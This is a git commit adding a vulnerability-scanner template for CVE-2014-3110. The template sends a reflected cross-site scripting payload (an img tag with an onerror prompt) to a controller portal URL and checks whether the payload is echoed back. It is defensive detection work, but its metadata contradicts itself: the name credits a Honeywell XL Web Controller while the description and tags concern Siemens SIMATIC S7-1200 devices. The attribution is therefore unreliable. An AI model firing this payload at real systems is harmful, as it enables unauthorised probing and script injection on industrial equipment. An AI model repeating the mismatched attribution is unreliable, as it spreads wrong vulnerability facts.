Create CVE-2014-3110.yaml
parent
ac75077e75
commit
f8771cea8f
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2014-3110
|
||||
|
||||
info:
|
||||
name: Honeywell XL Web Controller - Reflected Cross-Site Scripting
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
|
||||
reference: https://www.exploit-db.com/exploits/44687
|
||||
tags: cve,cve2014,xss,siemens
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%281%29%3B%3E&Send=Filter'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"><img src=x onerror=prompt(1);>'
|
Loading…
Reference in New Issue